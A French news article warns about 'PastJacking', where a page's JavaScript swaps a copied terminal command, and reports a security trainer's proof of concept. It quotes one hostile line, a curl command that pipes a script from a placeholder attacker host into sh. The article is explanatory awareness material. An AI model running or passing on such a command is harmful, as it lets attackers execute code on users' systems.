Piratage : Copier-coller des commandes issues d’une page web peut être très dangereux !

Les programmeurs, les administrateurs système, les chercheurs en sécurité ou encore ceux qui aiment bidouiller sur leur PC ont pour habitude de copier-coller des commandes couramment utilisés à partir d'une page web. Seulement et comme le rappelle le spécialiste Gabriel Friedlander, cette pratique n'est pas sans risque. Loin de là.

Le copier-coller fait partie des manipulations les plus utilisées, que ce soit par les utilisateurs lambda, les programmeurs, les administrateur système, les chercheurs en sécurité informatique ou encore ceux qui aiment bidouiller sur leur PC. Seulement, Gabriel Friendlander, fondateur de la plateforme de formation à la sécurité informatique Wizer, tient à rappeler que cette pratique est loin d'être sans risque, notamment lorsqu'il s'agit de copier-coller des commandes affichées sur des pages Web.

En effet, il n'est pas rare que les développeurs, novices comme expérimentés, copient-collent des commandes couramment utilisées à partir d'une page web (StackOverflow par exemple) dans leurs applications, dans une invite de commande Windows ou dans un terminal Linux.

Mais comme le rappelle M. Friendlander, il existe une méthode qui permet à un attaquant de modifier le contenu de votre presse papier. Le PastJacking, c'est son nom, consiste à l'introduction de lignes de codes malveillantes qui seront automatiquement exécutées lorsque l'utilisateur va coller son texte dans une fenêtre de terminal. Dans une preuve de concept plutôt simple publiée sur son blog personnel, M. Friedlander demande aux lecteurs de copier une commande que la plupart des administrateurs système et des développeurs connaissent : sudo apt udpate (ndrl : une commande utilisée pour récupérer des informations mises à jour sur les logiciels installés sur votre système).

UN COPIER-COLLER PEUT FAIRE DE GROS DÉGÂTS
En copiant-collant cette commande dans une zone de texte ou un bloc-note, on se rend compte que le contenu est totalement différent. En effet, la commande sudo apt update est devenue curl http://attacker-domain:8000/shell.sh | sh. En réalité, la supercherie se trouve dans le code Javascript caché derrière la page HTML de la preuve de concept mise en place par Friendlander.

Pour faire simple, dès que vous copiez la commande “sudo apt update” dans un élément HTML, le bout de code malveillant affiché ci-dessous s'exécute. Plus précisément, c'est un écouteur d'évènements Javascript qui capture l'évènement de copie et remplace les données du presse-papiers par le code malveillant de M. Friedlander. “C'est pourquoi vous ne devriez jamais copier-coller des commandes directement dans votre terminal […] Il suffit d'une seule ligne de code injectée dans le code que vous avez copié pour créer une porte dérobée dans votre application. Cette attaque est très simple, mais particulièrement efficace”, prévient-il.